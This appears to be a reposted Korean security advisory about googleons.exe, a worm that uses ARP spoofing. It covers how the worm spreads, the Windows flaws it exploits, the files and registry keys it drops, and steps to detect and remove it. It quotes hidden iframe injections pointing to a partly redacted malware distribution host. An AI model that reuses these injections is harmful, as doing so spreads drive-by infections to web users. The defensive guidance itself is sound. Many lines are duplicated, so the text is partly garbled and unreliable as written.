반응형
□ 개요
o 최근 국내에서 ARP Spoofing을 통해 감염되고, 감염 시 네트워크를 마비 시키는 악성코드가
등장하여 주의가 필요함
o 특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를 주기적으로 탐지하고
공격 근원지를 파악하여 관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함
등장하여 주의가 필요함
o 특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를 주기적으로 탐지하고
공격 근원지를 파악하여 관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함
□ 전파방법
o 최초 googleons.exe에 감염된 PC는 ARP Spoofing 공격
- 해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로 ARP Reply를
지속적으로 보냄
- 게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를 지속적으로
보냄
- 해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로 ARP Reply를
지속적으로 보냄
- 게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를 지속적으로
보냄
o 감염된 PC와 동일 네트워크에 연결되어 있는 호스트들은 감염된 PC를 게이트웨이로 인식하게
하여 모든 패킷을 모니터링 및 변조 할 수 있음
- ARP Spoofing공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고 아래와 같은
정보를 삽입해 악성코드 유포지 사이트로 유도
하여 모든 패킷을 모니터링 및 변조 할 수 있음
- ARP Spoofing공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고 아래와 같은
정보를 삽입해 악성코드 유포지 사이트로 유도
"<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>"
o 악성코드 유포지 down.online[생략].net으로 유도된 PC중 아래와 같은 윈도우 취약점 패치가
안된 사이트는 googleons.exe에 감염됨
안된 사이트는 googleons.exe에 감염됨
- MS05-025
- MS06-014
- MS07-017
- MS07-027
- MS06-014
- MS07-017
- MS07-027
□ 악성행위 (googleons.exe)
o 감염 PC와 동일 네트워크 대역 ARP Spoofing 공격
o 동일 네트워크에 존재하는 PC들의 HTTP 통신 패킷 변조
"<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe></IFRAME P ?<></IFRAME IFRAME <>" 삽입
o USB를 통한 악성코드 전파
o 감염 PC에 존재하는 .html, tml, asp, php, jsp 확장자에 아래와 같은 악성코드 삽입
- "<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe></IFRAME P ?<></IFRAME IFRAME <>"
- "<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe></IFRAME P ?<></IFRAME IFRAME <>"
o 감염시 생성되는 파일
- C:\Document and Settings\[계정]\Local Settings\Temp\
autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)
googleons.exe
disocoo.exe (실행뒤 삭제)
npptools.dll
Packet.dll
WanPacket.dll
yahoons.exe (실행뒤 삭제)
- C:\windows\system32\ (yahoons.exe 실행에 의해 생성되는 파일들)
dllhost32.exe
mh104.dll
moyu103.dll
mosou.exe
mydata.exe
nwizwmgjs.exe
nwizwmgjs.dll
nwizzhuxians.exe
nwizzhuxians.dll
RAV00xx.exe등 다수
- C:\Document and Settings\[계정]\Local Settings\Temp\
autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)
googleons.exe
disocoo.exe (실행뒤 삭제)
npptools.dll
Packet.dll
WanPacket.dll
yahoons.exe (실행뒤 삭제)
- C:\windows\system32\ (yahoons.exe 실행에 의해 생성되는 파일들)
dllhost32.exe
mh104.dll
moyu103.dll
mosou.exe
mydata.exe
nwizwmgjs.exe
nwizwmgjs.dll
nwizzhuxians.exe
nwizzhuxians.dll
RAV00xx.exe등 다수
o 부팅 후 재시작 할 수 있는 레지스트리에 등록
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 이름 : svc
- 파일 이름 : googleons.exe
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 이름 : svc
- 파일 이름 : googleons.exe
□ 감염여부 확인 및 치료방법
o 감염여부 확인
- L3 또는 라우터에서 감염 PC 확인
중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인)
※ krcert 홈페이지->기술문서->ARP Spoofing 공격 및 대책 참고
- L3 또는 라우터에서 감염 PC 확인
중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인)
※ krcert 홈페이지->기술문서->ARP Spoofing 공격 및 대책 참고
- ARP Spoofing 피해 PC에서 공격 PC 확인
전체 네트워크 Ping 스캔
중복 MAC 주소 IP 확인
전체 네트워크 Ping 스캔
중복 MAC 주소 IP 확인
※ krcert 홈페이지->기술문서->ARP Spoofing 공격 및 대책 참고
- 악성코드 감염 및 ARP Spoofing 공격 PC 확인
C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe 존재여부 확인
googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]
C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe 존재여부 확인
googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]
o 치료방법
- C:\Document and Settings\[계정]\Local Settings\Temp\ 하위 악성코드들 삭제
- C:\Document and Settings\[계정]\Local Settings\Temp\ 하위 악성코드들 삭제
- 윈도우 시스템 폴더에 존재하는 악성코드들 삭제
- googleons.exe 프로세스 끝내기
"Ctrl" + "Alt" + "Del" 클릭 후 프로세스 메뉴에서 googleons.exe 프로세스 종료
- 레지스트리 삭제
googleons 재시작 레지스트리 삭제
시작 → 실행 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
. 기타 악성코드 레지스트리 삭제
시작 → 실행 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
□ 예방 방법
o 감염을 위한 사전 예방 방법
- 윈도 OS 최신 패치 실시
- 윈도 OS 최신 패치 실시
반응형